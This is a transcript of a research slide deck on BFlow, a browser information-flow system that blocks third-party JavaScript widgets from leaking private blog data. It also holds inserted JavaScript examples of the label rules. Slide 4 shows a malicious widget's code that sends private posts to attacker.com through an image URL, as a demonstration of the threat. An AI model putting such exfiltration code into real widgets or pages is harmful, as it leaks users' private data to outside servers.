Privacy-Preserving Browser-Side Scripting With BFlow - PowerPoint PPT Presentation

About This Presentation
Title: Privacy-Preserving Browser-Side Scripting With BFlow
Description: BFlow prevents the malicious widget from leaking private data ... Trusted JavaScript sets the label of a multi-frame widget only once ... – PowerPoint PPT presentation

Slides: 29
Provided by: eurosys200
Transcript and Presenter's Notes


1
Privacy-Preserving Browser-Side Scripting With BFlow
  • Alexander Yip, Neha Narula,
  • Maxwell Krohn, Robert Morris
  • Massachusetts Institute of Technology

2
Web Sites Support 3rd Party JavaScript Extensions
  • Blogger.com supports widgets
  • read and modify blog posts

3
Confidential Blogs Are Vulnerable to 3rd Party JavaScript
4
A 3rd Party JavaScript Leak Attack
Widget has access to private blog content
Widget's JavaScript source code:
  private_data = document.getElementById("posts");
  widget.innerHTML = private_data;
Shows private blog content in widget's box
Widget leaks private blog content to attacker.com:
  widget.innerHTML = "<IMG SRC=http://attacker.com/" + private_data + ".gif>";
  • Blogger.com wants to provide data to widgets
  • Browser security policy permits JS to send data
    freely
  • Wrote a malicious blogger.com widget in one hour

5
Problem: Extensibility vs. Privacy
(Choose one)
  • Either choose cool extensibility features
  • e.g. Blogger.com widgets
  • Or choose privacy and no 3rd party code
  • e.g. Gmail

Dan's Spell Checker
Joe's Encryption Widget
Check Spelling!
Encrypt Mail
Decrypt Mail
6
Solution: BFlow
  • Eliminate the choice between features and privacy
  • Add information flow control (IFC)
  • To JavaScript in the browser
  • Track private data inside the browser and server
  • Prohibit communication that leaks private data

7
Challenges
  • Fit JavaScript environment into an IFC model
  • Preserve JavaScript communication channels
  • Mashups with private data

Send to top-level frame
Send to sub-frame
  • Easy to adopt
  • Minimize changes to JS that uses existing
    communication channels
  • Minimize changes required on the server
  • Easy for end-users to start using

Private address
Google Maps Server
8
Contributions
  • An IFC model for the JS runtime environment
  • Easy to deploy and adopt implementation
  • Installs in browser with 2 clicks
  • Requires no changes to JavaScript interpreter
  • Only small changes to JavaScript communication
    API
  • A platform that supports real blogger.com widgets

9
BFlow Overview
Trusted Protection Zone
Untrusted Protection Zones
Blog Server Supplies Some HTML/JS
Blog Web Server
Blog Server labels private data with a tag
Reference Monitor knows when a zone reads private
data
attacker.com Server
Label: Saw Alice's private data
3rd Party Supplies Widget HTML/JS
Browser Reference Monitor
10
BFlow Overview
Declassification: Fetch map image from Google Maps, OK!
Have not seen private data: can send requests to any server
Blog Web Server
Have seen private data: can only send requests to the data's server
attacker.com Server
Google Maps Server
BFlow prevents the malicious widget from leaking
private data
Browser Reference Monitor
11
Design Outline
  • Tags and Labels
  • Protection Zones
  • Reference Monitor
  • Server

12
Tags And Labels
  • A label is a set of tags
  • Describes what private data an object contains
  • Each zone, HTTP request, and response has a label
  • Each tag identifies a kind of private data
  • Alice's tag: blogger.com:alice
  • Bob's tag: blogger.com:bob
  • e.g. Alice's blog has label L = {blogger.com:alice}

13
Data Flow Rule
  • Data may flow only if L_data ⊆ L_receiver

Data → Receiver JavaScript (allowed when L_data ⊆ L_receiver)
14
Protection Zones
  • A zone is a group of browser HTML <frames>
  • Regular JavaScript runs inside a frame inside a
    zone
  • All frames in a zone share the same label
  • Trusted zone
  • Top-level frame is in the site's trusted zone
  • Contains JavaScript written only by the site's
    developers
  • Need not abide by information flow restrictions
  • Untrusted zones
  • Contain 3rd party JavaScript
  • Must abide by information flow restrictions

15
Example Zones And Labels
Trusted Zone (No Label)
Zone A: L = {}
Zone C: L = {}
Zone D: L = {blogger.com:alice}
Zone B: L = {blogger.com:alice}
16
How Do Untrusted Zones Get Labels?
Trusted zone sets untrusted zone's label
L = {}
L = {blogger.com:alice}
augment_label("blogger.com:alice")
Blog Web Server
Browser Reference Monitor
17
Works With Existing JS Channels
  • Channel 1: A frame can always send to its child
    frame
  • L_parent ⊆ L_child
  • Channel 2: A frame can always send to the
    top-level frame
  • To avoid leaking data, untrusted zones may
    contain only tags from the web site in the
    top-level frame

Web Page Showing Inherent JavaScript Channels
Top-level Frame from X.com
Frame 1 may not add X.com:C to its label
Frame 1: L = {X.com:A}
No sub-frame from X.com may add a tag from Y.com
Frame 2: L = {X.com:A, X.com:B}
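The two channel rules above, applied to the slide's frame tree, as an added example in JavaScript (not code from the BFlow extension). It assumes tags are "site:name" strings whose prefix names the site, frames are plain objects with a `label` Set and `children`, and `mayAddTag` is a hypothetical reference-monitor check that rejects a label change if either rule would break anywhere in the tree.

```javascript
// Added example, not BFlow's own code: the two channel rules on this slide
// applied to a frame tree. Tags are "site:name" strings, labels are Sets.
const subset = (a, b) => [...a].every((t) => b.has(t));
const siteOf = (tag) => tag.split(":")[0];

// Channel 1: a frame can always send to its child, so L_parent ⊆ L_child
// must hold for every parent/child pair below `frame`.
function channel1Holds(frame) {
  return frame.children.every(
    (c) => subset(frame.label, c.label) && channel1Holds(c));
}

// Channel 2: every frame can send to the top-level frame, so untrusted
// frames may carry only tags that belong to the top-level frame's site.
function channel2Holds(frame, topSite) {
  return [...frame.label].every((t) => siteOf(t) === topSite) &&
    frame.children.every((c) => channel2Holds(c, topSite));
}

// Hypothetical reference-monitor check: may `tag` be added to `frame`'s
// label without breaking either rule anywhere in the tree under `root`?
function mayAddTag(root, topSite, frame, tag) {
  const saved = frame.label;
  frame.label = new Set([...saved, tag]);               // trial change
  const ok = channel1Holds(root) && channel2Holds(root, topSite);
  frame.label = saved;                                  // undo the trial
  return ok;
}

// Constructed frame tree matching the slide's diagram: top-level frame from
// X.com, Frame 1 inside it, Frame 2 inside Frame 1.
const frame2 = { name: "Frame 2", label: new Set(["X.com:A", "X.com:B"]), children: [] };
const frame1 = { name: "Frame 1", label: new Set(["X.com:A"]), children: [frame2] };
const topFrame = { name: "top-level", label: new Set(), children: [frame1] };

console.log(mayAddTag(topFrame, "X.com", frame1, "X.com:C"));  // false: Frame 2 would lack X.com:C
console.log(mayAddTag(topFrame, "X.com", frame2, "X.com:C"));  // true: leaf frame, same site
console.log(mayAddTag(topFrame, "X.com", frame2, "Y.com:Q"));  // false: tag from another site
```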
18
Why Zones Instead Of Frames?
  • Some JavaScript consists of multiple frames
  • Group JavaScript into modules by label
  • All frames in the same zone can always
    communicate
  • Trusted JavaScript sets the label of a
    multi-frame widget only once
  • Existing multi-frame widgets need not coordinate
    label changes

e.g. Cbox chat widget
Bottom frame writes messages to top frame
19
BFlow's JavaScript Model
  • All JavaScript will work if the IFC rules allow
  • AJAX, eval()
  • The IFC rule (L_data ⊆ L_receiver) affects
  • access to DOM variables and cookies
  • postMessage(), fragment-ID messages
  • HTTP requests and responses

20
HTTP Request Rules
  • Trusted zone T
  • can send to any server (always)
  • can receive a response from any server (always)
  • Untrusted zone Z
  • can send to the server where secret data came
    from (always)
  • can receive the response (when L_response ⊆ L_Z)
  • can send to 3rd party server E (when L_Z = {})
  • or web site has a declassification exception for
    (server E, URL)
  • can receive the response (always)

21
The BFlow Server API
  • Propagate label from HTTP requests to responses
  • Read label contained in each request
  • Attach the label to any response that uses
    labeled data

HTTP Request: POST save_post?contents=sell_petfood_online, Label: L = {blogger.com:alice}
Zone A: L = {blogger.com:alice}
Blog Web Server
L = {blogger.com:alice}
L = {blogger.com:alice}
Zone B: L = {blogger.com:alice}
HTTP Response: Contents: sell_petfood_online, Label: L = {blogger.com:alice}
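The request and response rules of slide 20 and the server-side label propagation of slide 21, run end to end as an added example in JavaScript (not the BFlow extension's or BFlogger's code). It assumes tags are "site:user" strings whose site part names the server the data came from, that `declass` is the web site's list of (server, URL) declassification exceptions, and a constructed toy blog server in place of the real one.

```javascript
// Added example, not BFlow's own code: slide 20's rules plus slide 21's
// server API. Labels are Sets of "site:user" tags; L_Z = {} is an empty Set.
const subset = (a, b) => [...a].every((t) => b.has(t));
const siteOf = (tag) => tag.split(":")[0];
const hasDataFrom = (zone, server) => [...zone.label].some((t) => siteOf(t) === server);

// Send rule. `declass` is the web site's declassification exception list.
function maySend(zone, server, url, declass = []) {
  if (zone.trusted) return true;                        // trusted zone T: always
  if (hasDataFrom(zone, server)) return true;           // server the secret came from
  if (zone.label.size === 0) return true;               // L_Z = {}: nothing private seen
  return declass.some((d) => d.server === server && d.url === url);
}

// Receive rule: L_response ⊆ L_Z. An unlabeled 3rd-party response always passes.
function mayReceive(zone, responseLabel) {
  return zone.trusted || subset(responseLabel, zone.label);
}

// Server API: read the label on each request, store it with the data, and
// attach the union of the stored labels to any response built from that data.
function makeBlogServer() {
  const posts = [];                                     // constructed toy store
  return (req) => {
    if (req.path === "save_post") {
      posts.push({ body: req.params.contents, label: new Set(req.label) });
      return { status: 200, body: "saved", label: new Set(req.label) };
    }
    const label = new Set(posts.flatMap((p) => [...p.label]));
    return { status: 200, body: posts.map((p) => p.body), label };
  };
}

// One round trip through the monitor: the response, or which side blocked it.
function exchange(zone, server, req, handler, declass) {
  if (!maySend(zone, server, req.path, declass)) return "blocked: send";
  const res = handler({ ...req, label: zone.label });
  return mayReceive(zone, res.label) ? res : "blocked: receive";
}

// Constructed scenario from slides 10 and 21.
const blog = makeBlogServer();
const thirdParty = () => ({ status: 200, body: "", label: new Set() });
const zoneA = { trusted: false, label: new Set(["blogger.com:alice"]) };
const zoneC = { trusted: false, label: new Set() };
const maps = [{ server: "maps.google.com", url: "map" }];
console.log(exchange(zoneA, "blogger.com", { path: "save_post", params: { contents: "sell_petfood_online" } }, blog).body); // saved
console.log(exchange(zoneA, "attacker.com", { path: "x.gif", params: {} }, thirdParty));       // blocked: send
console.log(exchange(zoneC, "blogger.com", { path: "get_posts", params: {} }, blog));          // blocked: receive
console.log(exchange(zoneA, "maps.google.com", { path: "map", params: {} }, thirdParty, maps).status); // 200
```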
22
BFlow Implementation
No changes to JavaScript interpreter
JavaScript communication API changed slightly
Firefox extension: 1100 lines of code; users can install with 2 clicks
Browser Reference Monitor
23
Zone Isolation
  • Repurpose browser's same-origin policy (SOP)
  • Zones communicate via reference monitor
  • SOP is conservative: no DOM read/write across
    zones even if labels would allow

Domain name: Zone1.blogger
No direct communication
Domain name: Zone2.blogger
24
Applications
  • BF-Socialnet
  • Social network that supports 3rd party JS
    extensions
  • Protects private user data (see paper)
  • BFlogger
  • Blog mockup that supports blogger.com widgets
  • Ported 12 existing widgets to BFlogger

25
BFlow Preserves Privacy
  • Wrote a malicious Blogger.com widget
  • Successfully leaks data from confidential blogs
  • Ported widget to BFlogger
  • BFlow prevents malicious widget from leaking data

attacker.com Server
No requests to attacker.com after reading private
data
26
BFlow Runs Existing JavaScript
  • Better privacy with little or no changes

High because we made Chat store data on the BFlow
server to protect chat data
27
Existing Research
  • Can't grant read access without also leaking:
    MashupOS
  • Requires rewriting JavaScript, manual jail
    config: Caja
  • Don't support untrusted JavaScript: Swift, SIF
  • User must make disclosure decisions: NoMoXSS
  • Certificates: Java

28
Conclusion
  • 3rd party JavaScript can leak confidential user
    data
  • BFlow provides a new web security model
  • Tracks information flow between client and server
  • 3rd party JavaScript can safely compute and
    display
  • Enables new features in web sites
  • e.g. 3rd party Gmail extensions

Questions